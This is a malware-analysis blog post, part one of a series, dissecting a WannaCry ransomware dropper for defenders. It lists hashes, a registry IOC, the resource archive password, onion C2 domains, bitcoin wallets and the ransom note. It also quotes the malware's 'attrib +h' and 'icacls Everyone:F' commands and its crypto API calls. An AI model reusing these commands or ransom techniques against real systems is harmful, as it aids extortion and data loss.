In-depth analysis of WannaCry series (Part 1)

39 min readMay 10, 2023

After I got a lot of shares in my last article for Emotet Full Code analysis, I decided to analyze WannaCry ransomware in detail also, my articles were not the same ones published by others, my articles focused on the detail which helped Malware Analysts, Threat Researchers, SOC to improve their level. Also to anyone want to know How does WannaCry work?

Introduction:

WannaCry is an example of crypto ransomware, a type of malicious software (malware) used by cybercriminals to extort money.

The WannaCry ransomware attack was a global epidemic that took place in May 2017.

This ransomware attack spread through computers operating Microsoft Windows. User’s files were held hostage, and a Bitcoin ransom was demanded for their return.

The cybercriminals responsible for the attack took advantage of a weakness in the Microsoft Windows operating system using a hack that was allegedly developed by the United States National Security Agency.

Known as EternalBlue, this hack was made public by a group of hackers called the Shadow Brokers before the WannaCry attack.

This Introduction was made by Kaspersky.

In this article, we dive into the details of the WannaCry attack, analyzing its origins, methods, and impact. Part 1 focuses on the initial infection vector and the technical details of the malware used by analyzing the droppers only without the decryption process. Through this analysis, readers can gain a deeper understanding of the WannaCry attack and the lessons that can be learned from it to prevent future attacks.

We will know also the full picture of the WannaCry In Sha’ Allah, and How in detail can be in a dropper?

سبحان الله وبحمده ، سبحان الله العظيم

Where I got This file?

From Malware Trends by any.run website, we can see TOP malwares for a week, month, year, and global rank.

And then from Any family you choose, you can see its rank and the last files submitted which I downloaded.

Also, I choose this ransomware, because it faces me in 2020 while I worked as a Threat Researcher, That’s why I choose it, not RedLine.

لا إله إلا الله

AV can’t detect!!

I downloaded the compressed file: 80239619c4ca44380c6269873a5b6b695585ccfcf278e0f2c72698658a3a6fd8

As we can see, Fortinet only detected it as WannaCryptor, 2 vendors only detected it for the first time, and now become 6 vendors.

This file dropped an executable file called:

Proforma Invoice and Bank swift-REG.PI-0086547654.exe

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

which we can see from its name, he used Social Engineering by Invoice to run it.

it was detected by 61 vendors only 7 vendors have not detected [Malwarebytes one of them ] and 5 can’t process it.

Static Malware Analysis:

File Name: diskpart.exe

md5: 0E14014289C29078069237196BD3EA72
sha1: 466A736F7F6987B34CD7A130E26A8AF13D3CF76C
sha256: F8CBC0DDB17A85F2BA099416961EFEF915F8EBA926681DF7CD2C1FA69F3C2B6A
file-type,dynamic-link library
FileDescription,DiskPart
FileVersion,6.1.7601.17514 (win7sp1_rtm.101119–1850)

— — — — — →[| CAN BE FAKE |]← — — — —

***The version number “6.1.7601.17514” is for Windows 7 Service Pack 1 (SP1) with build number “7601”. The numbers “6.1” indicate the major and minor version numbers of Windows 7, while “7601” represents the build number. The last set of numbers, “17514”, is the file version number, which identifies the specific build and version of the file.
The “(win7sp1_rtm.101119–1850)” at the end of the version number is a more detailed identifier that indicates the operating system version, service pack number, and the date and time of the build. “win7sp1” means it is Windows 7 with Service Pack 1, “rtm” stands for “release to manufacturing,” indicating it is a final, fully tested version, and “101119–1850” indicates the build date and time (November 19, 2010, at 18:50).***

LegalCopyright,© Microsoft Corporation. All rights reserved.
ProductName,Microsoft® Windows® Operating System

We can see here, he uses this version info to make itself as a usual program [ Trojan ] and all of this exist in the resource:

It’s a GUI program

compiler-stamp,0x4CE78F41 (Sat Nov 20 01:05:05 2010
— UTC)

Analyze the 2nd Stage

He gets a random string from the infected machine name:

And he checks if the command line includes the “/i” argument:

let’s see, what he can do for the first time:

he takes the directory which runs the malware and then calls a function that creates a registry key.

He creates a registry key called “Software\WanaCrypt0r” in HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER with the value “wd” which includes the directory path of the place where malware is executed.

now, the first IOC is:

HKEY_LOCAL_MACHINE\Software\WanaCrypt0r

HKEY_CURRENT_USER\Software\WanaCrypt0r

figure 6: the values of the stack before setting the value to the registry key

figure 7: The values where the WannaCry put in the HKEY_CU registry key

Then making persistence, let’s see in detail:

he put string “WNcry@2ol7” and then called the resource function which I called:

Taking the Resource name “80A” or “2058” in decimal and its Type “XIA” which is not widely typed, then calling a function

Analyzing the dropped files:

Let’s Open it with the Resource Hacker tool, and it’s a compressed resource whose resource format is “PK”, let’s save it and then uncompress it:

I’m using “7-ZIP” for compress files, let’s extract it:

He needs a password :O

let’s try “WNcry@2ol7” which put as an argument to the function:

It works, and extracts a lot of files:

b.wnry, c.wnry, r.wnry, s.wnry, t.wnry, taskdl.exe, taskse.exe, u.wnry, and msg folder which includes a lot of files related to languages

let’s take the hash of all of these files by HashMyFiles tool:

But it takes time for taking all this data, let’s write a Python script for it:

import os
import hashlib
from datetime import datetime

# Replace with the directory you want to scan
directory = 'C:\\Users\\User\\Desktop\\WannaCry'

# Replace with the path and filename where you want to save the output
output_file = 'C:\\Users\\User\\Desktop\\WannaCry\\output.txt'

# Open the output file for writing
with open(output_file, 'w') as f:
    
    # Walk through the directory tree and process each file
    for root, dirs, files in os.walk(directory):
        for filename in files:
            filepath = os.path.join(root, filename)
            
            # Get file metadata
            file_stats = os.stat(filepath)
            file_size = file_stats.st_size
            file_modified = datetime.fromtimestamp(file_stats.st_mtime).strftime('%Y-%m-%d %H:%M:%S')
            file_created = datetime.fromtimestamp(file_stats.st_ctime).strftime('%Y-%m-%d %H:%M:%S')
            
            # Calculate the SHA1 hash
            sha1_hash = hashlib.sha1()
            with open(filepath, 'rb') as f2:
                while True:
                    data = f2.read(1024)
                    if not data:
                        break
                    sha1_hash.update(data)
            sha1_hash = sha1_hash.hexdigest()
            
            # Write the output to the file
            output_line = f"{filename}\t{sha1_hash}\t{file_modified}\t{file_created}\t{file_size}\n"
            f.write(output_line)

and here is the output, and the Created data is: 2017–04–27 and the modified date is: 2017–05–11 which helped us for knowing the beginning of the Threat:

Name  File sha1 hash                           Modified Date       Created Date        File Size

b.wnry f19eceda82973239a1fdc5826bce7691e5dcb4fb 2017-05-11 04:13:18 2017-04-27 01:25:34 1440054
c.wnry f6b08523b1a836e2112875398ffefffde98ad3ca 2017-05-11 04:11:57 2017-05-10 09:16:21 780
r.wnry c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade 2017-05-10 23:59:13 2017-04-27 01:25:34 864
s.wnry d1af27518d455d432b62d73c6a1497d032f6120e 2017-05-09 00:58:43 2017-05-11 10:22:55 3038286
t.wnry 7b10aaeee05e7a1efb43d9f837e9356ad55c07dd 2017-05-11 10:22:55 2017-05-11 10:22:55 65816
taskdl.exe 47a9ad4125b6bd7c55e4e7da251e23f089407b8f 2017-05-11 10:22:55 2017-05-11 10:22:55 20480
taskse.exe be5d6279874da315e3080b06083757aad9b32c23 2017-05-11 10:22:55 2017-05-11 10:22:55 20480
u.wnry 45356a9dd616ed7161a3b9192e2f318d0ab5ad10 2017-05-11 10:22:55 2017-05-11 10:22:55 245760
m_bulgarian.wnry 81e427d15a1a826b93e91c3d2fa65221c8ca9cff 2010-11-19 11:16:58 2013-04-27 19:13:46 47879
m_chinese (simplified).wnry 5c14551d2736eef3a1c1970cc492206e531703c1 2010-11-19 11:16:58 2013-04-27 19:13:46 54359
m_chinese (traditional).wnry 52c07f98870eabace6ec370b7eb562751e8067e9 2010-11-19 11:16:58 2013-04-27 19:13:46 79346
m_croatian.wnry e325988f68d327743926ea317abb9882f347fa73 2010-11-19 11:16:58 2013-04-27 19:13:46 39070
m_czech.wnry 3609456e16bc16ba447979f3aa69221290ec17d0 2010-11-19 11:16:58 2013-04-27 19:13:46 40512
m_danish.wnry b548b45da8463e17199daafd34c23591f94e82cd 2010-11-19 11:16:58 2013-04-27 19:13:46 37045
m_dutch.wnry d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b 2010-11-19 11:16:58 2013-04-27 19:13:46 36987
m_english.wnry 6c6e49949957215aa2f3dfb72207d249adf36283 2010-11-19 11:16:58 2013-04-27 19:13:46 36973
m_filipino.wnry 2da1025bbbfb3cd308070765fc0893a48e5a85fa 2010-11-19 11:16:58 2013-04-27 19:13:46 37580
m_finnish.wnry e354d1cc43d6a39d9732adea5d3b0f57284255d2 2010-11-19 11:16:58 2013-04-27 19:13:46 38377
m_french.wnry 0fccbc91f0f94453d91670c6794f71348711061d 2010-11-19 11:16:58 2013-04-27 19:13:46 38437
m_german.wnry 26781d4b06ff704800b463d0f1fca3afd923a9fe 2010-11-19 11:16:58 2013-04-27 19:13:46 37181
m_greek.wnry 1088c7653cba385fe994e9ae34a6595898f20aeb 2010-11-19 11:16:58 2013-04-27 19:13:46 49044
m_indonesian.wnry eb3b87f7f654b604daf3484da9e02ca6c4ea98b7 2010-11-19 11:16:58 2013-04-27 19:13:46 37196
m_italian.wnry c4b1b3c087bd12b063e98bca464cd05f3f7b7882 2010-11-19 11:16:58 2013-04-27 19:13:46 36883
m_japanese.wnry 51eb7a254a33d05edf188ded653005dc82de8a46 2010-11-19 11:16:58 2013-04-27 19:13:46 81844
m_korean.wnry d636daf64d524f81367ea92fdafa3726c909bee1 2010-11-19 11:16:58 2013-04-27 19:13:46 91501
m_latvian.wnry fbea4f170507cde02b839527ef50b7ec74b4821f 2010-11-19 11:16:58 2013-04-27 19:13:46 41169
m_norwegian.wnry 75ad3b1ad4fb14813882d88e952208c648f1fd18 2010-11-19 11:16:58 2013-04-27 19:13:46 37577
m_polish.wnry 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff 2010-11-19 11:16:58 2013-04-27 19:13:46 39896
m_portuguese.wnry ca915fbe020caa88dd776d89632d7866f660fc7a 2010-11-19 11:16:58 2013-04-27 19:13:46 37917
m_romanian.wnry e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d 2010-11-19 11:16:58 2013-04-27 19:13:46 52161
m_russian.wnry 442e31f6556b3d7de6eb85fbac3d2957b7f5eac6 2010-11-19 11:16:58 2013-04-27 19:13:46 47108
m_slovak.wnry fee0fd58b8efe76077620d8abc7500dbfef7c5b0 2010-11-19 11:16:58 2013-04-27 19:13:46 41391
m_spanish.wnry 2091e42fc17a0cc2f235650f7aad87abf8ba22c2 2010-11-19 11:16:58 2013-04-27 19:13:46 37381
m_swedish.wnry 06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae 2010-11-19 11:16:58 2013-04-27 19:13:46 38483
m_turkish.wnry cc56978681bd546fd82d87926b5d9905c92a5803 2010-11-19 11:16:58 2013-04-27 19:13:46 42582
m_vietnamese.wnry 2e4791f9cdfca8abf345d606f313d22b36c46b92 2010-11-19 11:16:58 2013-04-27 19:13:46 93778

here are the hashes:

import hashlib
import os

directory_path = "C:\\Users\\User\\Desktop\\WannaCry" # change this to the path of the directory you want to hash files in

for filename in os.listdir(directory_path):
    filepath = os.path.join(directory_path, filename)
    if os.path.isfile(filepath):
        with open(filepath, "rb") as f:
            file_hash = hashlib.sha1()
            while chunk := f.read(8192):
                file_hash.update(chunk)
        print(f"{filename}: {file_hash.hexdigest()}") #you can remove the file name

f19eceda82973239a1fdc5826bce7691e5dcb4fb
f6b08523b1a836e2112875398ffefffde98ad3ca
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade
d1af27518d455d432b62d73c6a1497d032f6120e
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd
47a9ad4125b6bd7c55e4e7da251e23f089407b8f
be5d6279874da315e3080b06083757aad9b32c23
45356a9dd616ed7161a3b9192e2f318d0ab5ad10
3e68654567c4b434285f103735b33f6fc7343086

81e427d15a1a826b93e91c3d2fa65221c8ca9cff
5c14551d2736eef3a1c1970cc492206e531703c1
52c07f98870eabace6ec370b7eb562751e8067e9
e325988f68d327743926ea317abb9882f347fa73
3609456e16bc16ba447979f3aa69221290ec17d0
b548b45da8463e17199daafd34c23591f94e82cd
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
6c6e49949957215aa2f3dfb72207d249adf36283
2da1025bbbfb3cd308070765fc0893a48e5a85fa
e354d1cc43d6a39d9732adea5d3b0f57284255d2
0fccbc91f0f94453d91670c6794f71348711061d
26781d4b06ff704800b463d0f1fca3afd923a9fe
1088c7653cba385fe994e9ae34a6595898f20aeb
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7
c4b1b3c087bd12b063e98bca464cd05f3f7b7882
51eb7a254a33d05edf188ded653005dc82de8a46
d636daf64d524f81367ea92fdafa3726c909bee1
fbea4f170507cde02b839527ef50b7ec74b4821f
75ad3b1ad4fb14813882d88e952208c648f1fd18
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff
ca915fbe020caa88dd776d89632d7866f660fc7a
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6
fee0fd58b8efe76077620d8abc7500dbfef7c5b0
2091e42fc17a0cc2f235650f7aad87abf8ba22c2
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae
cc56978681bd546fd82d87926b5d9905c92a5803
2e4791f9cdfca8abf345d606f313d22b36c46b92

And here for searching all these hashes in virus total:

import hashlib
import os
import requests

# Enter your VirusTotal API key here
API_KEY = 'your_api_key_here'

# Function to calculate SHA1 hash of a file
def sha1_checksum(filename):
    with open(filename, 'rb') as f:
        sha1 = hashlib.sha1()
        while True:
            data = f.read(8192)
            if not data:
                break
            sha1.update(data)
    return sha1.hexdigest()

# Function to search for file hash on VirusTotal
def search_virustotal(file_hash):
    url = 'https://www.virustotal.com/vtapi/v2/file/report'
    params = {'apikey': API_KEY, 'resource': file_hash}
    response = requests.get(url, params=params)
    if response.status_code == 200:
        json_response = response.json()
        if json_response['response_code'] == 1:
            return json_response['positives'], json_response['total']
    return None, None

# Enter the directory path containing the files to investigate
dir_path = '/path/to/directory'

# Iterate over all files in the directory
for filename in os.listdir(dir_path):
    file_path = os.path.join(dir_path, filename)
    # Calculate SHA1 hash of the file
    file_hash = sha1_checksum(file_path)
    # Search for file hash on VirusTotal
    positives, total = search_virustotal(file_hash)
    if positives is not None and total is not None:
        print(f"{filename}: {positives}/{total} vendors detected the file as malicious on VirusTotal.")
    else:
        print(f"Could not retrieve data for {filename} from VirusTotal.")

c.wnry

And after opening the c.wnry file, I found a C2 server which onion websites and the link for the Tor browser:

WannaCry C2 server:

gx7ekbenv2riucmf[.]onion

57g7spgrzlojinas[.]onion

xxlvbrloxvriy2c5[.]onion

76jdd2ir2embyv47[.]onion

cwwnhwhlz52maqm7[.]onion

And include the link for downloading the TOR Browser version 6.5.1 to communicate for these Dark Web domains:

https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10[.]zip

and it helps us with Network Analysis to detect which machines are connected to this onion domain and the TOR URL download.

u.wnry

it’s a 32-bit GUI executable file compiled at (Mon Jul 13 16:19:35 2009
— UTC)

file-size, 245760 (bytes)
signature, Microsoft Visual C++ v6.0
file-version, 6.1.7600.16385 (win7_rtm.090713–1255)
description, Load PerfMon Counters

md5,7BF2B57F2A205768755C07F238FB32CC
sha1,45356A9DD616ED7161A3B9192E2F318D0AB5AD10
sha256,B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25

And has a lot of resources under the name “Wana Decryptor”:

102 DIALOGEX 0, 0, 540, 360
STYLE DS_SETFONT | DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_APPWINDOW
CAPTION "Wana Decryptor"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
FONT 8, "MS Sans Serif"
{
   CONTROL "Check &Payment", 1004, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 160, 336, 180, 19 
   CONTROL "&Decrypt", 1003, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 360, 336, 180, 19 
   CONTROL "", 1000, "RICHEDIT", ES_LEFT | ES_MULTILINE | ES_AUTOVSCROLL | ES_READONLY | ES_WANTRETURN | WS_CHILD | WS_VISIBLE | WS_BORDER | WS_VSCROLL | WS_TABSTOP, 160, 26, 380, 251 , WS_EX_CLIENTEDGE
   CONTROL "", 1007, EDIT, ES_LEFT | ES_AUTOHSCROLL | ES_READONLY | WS_CHILD | WS_VISIBLE | WS_BORDER | WS_TABSTOP, 257, 304, 254, 19 
   CONTROL "Copy", 1009, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 513, 302, 22, 22 
   CONTROL "QR Code", 1017, STATIC, SS_LEFT | WS_CHILD | WS_GROUP, 508, 287, 29, 12 
   CONTROL "About bitcoin", 1013, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 18, 298, 119, 10 
   CONTROL "How to buy bitcoins?", 1010, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 18, 316, 119, 10 
   CONTROL "Contact Us", 1006, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 18, 334, 119, 10 
   CONTROL "Ooops, your files have been encrypted!", 1005, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 160, 3, 302, 19 , WS_EX_TRANSPARENT
   CONTROL 136, 1014, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE, 35, 5, 87, 82 , WS_EX_DLGMODALFRAME
   CONTROL 135, 1016, STATIC, SS_BITMAP | SS_SUNKEN | WS_CHILD | WS_VISIBLE, 160, 288, 91, 33 
   CONTROL "Your files will be lost on", 1019, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 16, 196, 126, 11 
   CONTROL "1/1/2017 00:00:00", 1020, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 11, 215, 124, 11 
   CONTROL "00:00:00:00", 1021, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 15, 251, 121, 21 
   CONTROL "Progress1", 1012, "msctls_progress32", PBS_SMOOTH | PBS_VERTICAL | WS_CHILD | WS_VISIBLE | WS_BORDER, 141, 210, 11, 56 
   CONTROL "Time Left", 1018, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 34, 235, 80, 11 
   CONTROL "", -1, BUTTON, BS_GROUPBOX | WS_CHILD | WS_VISIBLE, 6, 184, 149, 93 
   CONTROL "Payment will be raised on", 1022, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 10, 100, 140, 11 
   CONTROL "1/1/2017 00:00:00", 1023, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 11, 118, 124, 11 
   CONTROL "00:00:00:00", 1025, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 15, 155, 121, 21 
   CONTROL "Progress1", 1011, "msctls_progress32", PBS_SMOOTH | PBS_VERTICAL | WS_CHILD | WS_VISIBLE | WS_BORDER, 141, 114, 11, 56 
   CONTROL "Time Left", 1024, STATIC, SS_CENTER | WS_CHILD | WS_VISIBLE | WS_GROUP, 34, 140, 80, 11 
   CONTROL "", -1, BUTTON, BS_GROUPBOX | WS_CHILD | WS_VISIBLE, 6, 88, 149, 93 
   CONTROL "Send $300 worth of bitcoin to this address:", 1026, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 257, 286, 277, 15 
   CONTROL "", -1, BUTTON, BS_GROUPBOX | WS_CHILD | WS_VISIBLE, 160, 278, 379, 51 
   CONTROL "", 1039, COMBOBOX, CBS_DROPDOWNLIST | WS_CHILD | WS_VISIBLE | WS_VSCROLL | WS_TABSTOP, 466, 7, 73, 149 
}

And for decrypting:

checking your payment:

[ Version Info ]

1 VERSIONINFO
FILEVERSION 6,1,7600,16385
PRODUCTVERSION 6,1,7600,16385
FILEOS 0x40004
FILETYPE 0x1
{
BLOCK "StringFileInfo"
{
 BLOCK "040904B0"
 {
  VALUE "CompanyName", "Microsoft Corporation"
  VALUE "FileDescription", "Load PerfMon Counters"
  VALUE "FileVersion", "6.1.7600.16385 (win7_rtm.090713-1255)"
  VALUE "InternalName", "LODCTR.EXE"
  VALUE "LegalCopyright", "\xA9 Microsoft Corporation. All rights reserved."
  VALUE "OriginalFilename", "LODCTR.EXE"
  VALUE "ProductName", "Microsoft\xAE Windows\xAE Operating System"
  VALUE "ProductVersion", "6.1.7600.16385"
 }
}

BLOCK "VarFileInfo"
{
 VALUE "Translation", 0x0409 0x04B0  
}
}

[ Manifest ]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"
manifestVersion="1.0">
<assemblyIdentity
    name="Hola"
    version="1.0.0.1"
    processorArchitecture="X86"
    type="win32"
/>
<description>Hola</description>
<dependency>
    <dependentAssembly>
        <assemblyIdentity
            type="win32"
            name="Microsoft.Windows.Common-Controls"
            version="6.0.0.0"
            processorArchitecture="X86"
            publicKeyToken="6595b64144ccf1df"
            language="*"
        />
    </dependentAssembly>
</dependency>
</assembly>

So this file is another dropped big executable file, we will analyze it later.

t.wnry

is a WANACRY encoded file.

s.wnry

is a Compress File beginning with “PK” file format, let’s decompress it:

it extracts tor program:

r.wnry

is a message file for you after encrypting:

Q:  What's wrong with my files?

A:  Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
    If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
    Let's start decrypting!

Q:  What do I do?

A:  First, you need to pay service fees for the decryption.
    Please send %s to this bitcoin address: %s

    Next, please find an application file named "%s". It is the decrypt software.
    Run and follow the instructions! (You may need to disable your antivirus for a while.)
    
Q:  How can I trust?

A:  Don't worry about decryption.
    We will decrypt your files surely because nobody will trust us if we cheat users.

*   If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.

b.wnry

is a BM6 file format which may be for audio:

taskdl.exe

it’s a SQL Client Configuration Utility EXE.[ NOT a Malware ]

but it may be fake, We want to know why he using it. [ Yes, After analyzing we saw it’s a deletion program, details below ]

md5,4FEF5E34143E646DBF9907C4374276F5
sha1,47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
sha256,4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
file-size,20480 (bytes)
imphash,818097ACF11D6A2AC55031896B50D98C
signature,Microsoft Visual C++ v6.0
file-version,6.1.7600.16385 (win7_rtm.090713–1255)
description,SQL Client Configuration Utility EXE
file-type,executable
cpu,32-bit
subsystem,GUI
compiler-stamp,0x4A5BCD57 (Mon Jul 13 17:12:07 2009
— UTC)

taskse.exe

It’s used for communication. [ later we will know ]

[ The same here, after analyzing, we saw it’s a @WannaCryDecryptor@.exe , details below ].

md5,8495400F199AC77853C53B5A3F278F3E
sha1,BE5D6279874DA315E3080B06083757AAD9B32C23
sha256,2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
file-size,20480 (bytes)
imphash,A89F8E8FE712C2F1D82DFF25307D18C6
signature,Microsoft Visual C++ v6.0
file-version,6.1.7600.16385 (win7_rtm.090713–1255)
description,waitfor — wait/send a signal over a network
file-type,executable
cpu,32-bit
subsystem,GUI
compiler-stamp,0x4A5BC010 (Mon Jul 13 16:15:28 2009
— UTC)

All of These files, we will back later for analysis, after knowing what the main executable file can do.

Let’s continue, after calling the resource APIs, he calls a lot of subroutines related to resourcing but then he creates these files one by one.

CreateFileA("%currentDirectory%/b.wnry", 
GENERIC_WRITE, NULL, NULL, 
CREATE_ALWAYS, 
FILE_ATTRIBUTE_ARCHIVE );

And then writing a buffer to the file:

Ok, We know all of these files, let’s skip this:

We need to improve our writing from now and analyze only the important things, so, any details we will skip it.

Let’s see the Bitcoin function:

He takes the addresses of the Bitcoin wallets and the C2 servers which we declared earlier to a memory region.

and here is the copying function:

and here is the Bitcoin address with the onion websites:

BITCOIN Wallet Addresses:

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

from the URLs which I provided with the Bitcoin wallets, you can know how many bitcoin were received for this address.

ِAnd then Create Process with “attrib +h .”

figure 50

The command “attrib +h .” is used to hide all files and folders in the current directory by setting their “hidden” attribute.

and then create another process with the command line “”icacls . /grant Everyone:F /T /C /Q””

figure 52

This command is used to grant the “Full Control” permission to the “Everyone” group on all files and subdirectories in the current directory and its subdirectories (/T option). The /C option continues to process even if there are errors, and the /Q option suppresses the display of success messages.

The icacls command is a Windows command-line utility that is used to manage file and folder permissions. The /grant option is used to grant permissions to a user or group, and the Everyone keyword is a special identity that represents all users and groups in the system.

Then, He resolves these APIs to use them dynamically

And then, he uses this code for encryption:



CryptAcquireContextA(&hProv, NULL, 
"Microsoft Enhanced RSA and AES Cryptographic Provider", 
PROV_RSA_AES, 
CRYPT_VERIFYCONTEXT | CRYPT_SILENT); // These flags indicate that a new key container should not be created and that the function should operate silently, without displaying any user interface.

CryptImportKey(hProv, PUBLICKEYSTRUC, 1172, NULL, NULL, &HCRYPTKEY);

RSA2 PUBLIC KEY

----->[| PUBLICKEYSTRUC |]<------
0040EBF8  07 02 00 00 00 A4 00 00 52 53 41 32 00 08 00 00  .....¤..RSA2....  
0040EC08  01 00 01 00 43 2B 4D 2B 04 9C 0A D9 9F 1E DA 5F  ....C+M+...Ù..Ú_  
0040EC18  ED 32 A9 EF E1 CE 1A 50 F4 15 E7 51 7B EC B0 27  í2©ïáÎ.Pô.çQ{ì°'  
0040EC28  56 05 58 B4 F6 83 C9 B6 77 5B 80 61 18 1C AB 14  V.X´ö.É¶w[.a..«.  
0040EC38  D5 6A FD 3B 70 9D 13 3F 2E 21 13 F1 E7 AF E3 FB  Õjý;p..?.!.ñç¯ãû  
0040EC48  AB 6E 43 71 25 6D 1D 52 D6 05 5F 13 27 9E 28 89  «nCq%m.RÖ._.'.(.  
0040EC58  F6 CA 90 93 0A 68 C4 DE 82 9B AA C2 82 02 B1 18  öÊ...hÄÞ..ªÂ..±.  
0040EC68  60 01 63 1B BC 71 8D BE 64 88 5E D5 0D 6C C1 9C  `.c.¼q.¾d.^Õ.lÁ.  
0040EC78  C9 01 36 89 C9 80 37 8F 1D 89 67 4F 0C B1 3C 61  É.6.É.7...gO.±<a  
0040EC88  09 3A 02 5D B8 4E F5 88 0A 9F 8C 0A 86 DF 91 FE  .:.]¸Nõ......ß.þ  
0040EC98  CD 9F A3 A0 13 D3 2D 30 77 D1 F0 A8 D7 AB 96 E5  Í.£ .Ó-0wÑð¨×«.å  
0040ECA8  48 96 37 03 69 64 97 06 5C 27 50 8C 91 76 67 85  H.7.id..\'P..vg.  
0040ECB8  3A 6C 6A B2 59 12 0A 61 F2 A1 EE A8 24 C8 E4 B1  :lj²Y..aò¡î¨$Èä±  
0040ECC8  11 6D D6 CC F7 8F 4C 5E B0 55 84 81 6D 60 45 84  .mÖÌ÷.L^°U..m`E.  
0040ECD8  0F FC DF F9 27 A5 52 C9 5B 06 28 A3 DE 74 03 D6  .üßù'¥RÉ[.(£Þt.Ö  
0040ECE8  C7 72 66 DC BE A4 1E FF 20 96 ED 51 84 00 CC 9C  ÇrfÜ¾¤.ÿ .íQ..Ì.  
0040ECF8  36 64 F2 85 4D CF 36 60 DD C8 B0 F1 91 DB 7A 0B  6dò.MÏ6`ÝÈ°ñ.Ûz.  
0040ED08  83 EE CF EF 19 D7 12 DA AE 86 D9 F9 0E BE 02 AF  .îÏï.×.Ú®.Ùù.¾.¯  
0040ED18  78 F3 5B 49 BE 0C 98 AF B5 5F D6 8A 4C 05 48 64  xó[I¾..¯µ_Ö.L.Hd  
0040ED28  9C 40 E1 1C F9 3C C4 E4 42 08 2D B2 B8 8A E6 0B  .@á.ù<ÄäB.-²¸.æ.  
0040ED38  6D DF 93 CC 34 E8 48 30 93 5D DF 8D 2E B3 3D 35  mß.Ì4èH0.]ß..³=5  
0040ED48  E4 66 30 AD 8B E7 20 3D E0 C9 D9 6C 36 4B 79 B9  äf0..ç =àÉÙl6Ky¹  
0040ED58  64 CD BC 5E 24 48 D4 88 90 1C 3D 17 4E 65 0C EC  dÍ¼^$HÔ...=.Ne.ì  
0040ED68  FB 1B 2B EC 5C C3 06 D6 6C 39 D8 6C 7E 23 9F 40  û.+ì\Ã.Öl9Øl~#.@  
0040ED78  AF 40 61 B4 FB B1 F6 82 CD A1 26 B8 8D C8 38 8F  ¯@a´û±ö.Í¡&¸.È8.  
0040ED88  94 03 4E FB BB EC 17 5E DD 46 F7 E7 FB DF 25 21  ..Nû»ì.^ÝF÷çûß%!  
0040ED98  AD 35 BD 9B 1D B5 01 3F 4E B0 20 B7 23 36 79 81  .5½..µ.?N° ·#6y.  
0040EDA8  29 3C DE E2 76 D7 E6 1F 9F EA 2D A5 C4 6A AA 40  )<Þâv×æ..ê-¥Äjª@  
0040EDB8  30 0D CC FE 58 E9 89 28 CB D7 E4 9C 7B B9 50 17  0.ÌþXé.(Ë×ä.{¹P.  
0040EDC8  A7 31 21 3B B4 91 F3 84 A6 BD 9E 03 CA E9 CD EE  §1!;´.ó.¦½..ÊéÍî  
0040EDD8  4D 2B 29 FA 02 0F E7 2C AE 30 BD 85 CC 2D 13 83  M+)ú..ç,®0½.Ì-..  
0040EDE8  12 53 D3 F3 41 4E F5 23 D6 CE 5F 41 CD 81 7C 3B  .SÓóANõ#ÖÎ_AÍ.|;  
0040EDF8  F0 49 81 B8 EE 8D 35 3C BA EC 92 C7 EE CF 24 63  ðI.¸î.5<ºì.ÇîÏ$c  
0040EE08  01 F3 4A F4 D9 DA 8B E2 C0 A4 A5 7F DA 8F 3C 50  .óJôÙÚ.âÀ¤¥.Ú.<P  
0040EE18  19 EC C2 33 5A 8F EE 7B 5A E9 83 7A 96 FD 94 4B  .ìÂ3Z.î{Zé.z.ý.K  
0040EE28  69 50 9A D2 34 D1 09 61 45 96 7D D8 12 5E A8 AE  iP.Ò4Ñ.aE.}Ø.^¨®  
